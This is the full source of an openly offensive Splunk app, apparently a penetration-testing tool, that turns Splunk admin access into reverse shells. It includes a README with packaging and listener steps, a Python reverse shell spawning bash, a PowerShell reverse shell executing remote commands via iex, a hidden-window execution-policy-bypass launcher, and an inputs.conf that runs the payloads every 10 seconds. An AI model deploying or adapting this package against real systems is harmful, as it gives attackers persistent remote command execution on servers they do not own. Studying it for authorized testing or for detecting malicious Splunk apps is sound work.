├── README.md └── reverse_shell_splunk ├── bin ├── rev.py ├── run.bat └── run.ps1 └── default └── inputs.conf /README.md: -------------------------------------------------------------------------------- 1 | # reverse_shell_splunk 2 | A simple splunk package for obtaining reverse shells on both Windows and most *nix systems. 3 | 4 | # requirements 5 | * splunk administrative access 6 | * a netcat / socat listener on the attacking machine 7 | 8 | 9 | # how to use 10 | 11 | 12 | * Depending on the target machine, you will either need to edit the rev.py for unix type machines or run.ps1 for Windows machines. Enter your attacking machine IP and ports. 13 | * Your files and directory structure should look like this. 14 | 15 | 16 | ``` 17 | reverse_shell_splunk 18 | ├── bin 19 | │ ├── rev.py 20 | │ ├── run.bat 21 | │ └── run.ps1 22 | └── default 23 | └── inputs.conf 24 | 25 | ``` 26 | 27 | * inputs.conf in this instance is the configuration file that tells splunk to launch the run.bat file and at what interval. In the example below "run.bat" will be run every 10 seconds. Because splunk only runs .bat files, the call inside "run.bat" is to a file with its same name. When run.bat is called, run.ps1 being in the same directory and having the same name will be run. 28 | 29 | 30 | ``` 31 | [script://./bin/rev.py] 32 | disabled = 0 33 | interval = 10 34 | sourcetype = pentest 35 | 36 | [script://.\bin\run.bat] 37 | disabled = 0 38 | sourcetype = pentest 39 | interval = 10 40 | 41 | ``` 42 | * Once you have finished editing the files you will need to tar up the directory and its contents. Make sure to keep the directory and file structure in the example above. Lastly rename the .tgz file to .spl 43 | 44 | ``` 45 | 46 | tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk 47 | mv reverse_shell_splunk.tgz reverse_shell_splunk.spl 48 | 49 | ``` 50 | 51 | * Launch your listener and upload this package via the app installation page. 52 | 53 | ``` 54 | Listener options 55 | nc -nlvp "port" 56 | or 57 | socat `tty`,raw,echo=0 tcp-listen:"port" 58 | ``` 59 | 60 | Note: I have had to restart the splunk service on unix type machines in my testing for this to work. No restarts are needed on windows machine. 61 | -------------------------------------------------------------------------------- /reverse_shell_splunk/bin/rev.py: -------------------------------------------------------------------------------- 1 | import sys,socket,os,pty 2 | 3 | ip="attacker-ip-here" 4 | port="attacker port here" 5 | s=socket.socket() 6 | s.connect((ip,int(port))) 7 | [os.dup2(s.fileno(),fd) for fd in (0,1,2)] 8 | pty.spawn('/bin/bash') 9 | -------------------------------------------------------------------------------- /reverse_shell_splunk/bin/run.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'" 3 | Exit -------------------------------------------------------------------------------- /reverse_shell_splunk/bin/run.ps1: -------------------------------------------------------------------------------- 1 | #A simple and small reverse shell. Options and help removed to save space. 2 | #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. 3 | $client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 4 | 5 | -------------------------------------------------------------------------------- /reverse_shell_splunk/default/inputs.conf: -------------------------------------------------------------------------------- 1 | [script://./bin/rev.py] 2 | disabled = 0 3 | interval = 10 4 | sourcetype = pentest 5 | 6 | [script://.\bin\run.bat] 7 | disabled = 0 8 | sourcetype = pentest 9 | interval = 10 10 | --------------------------------------------------------------------------------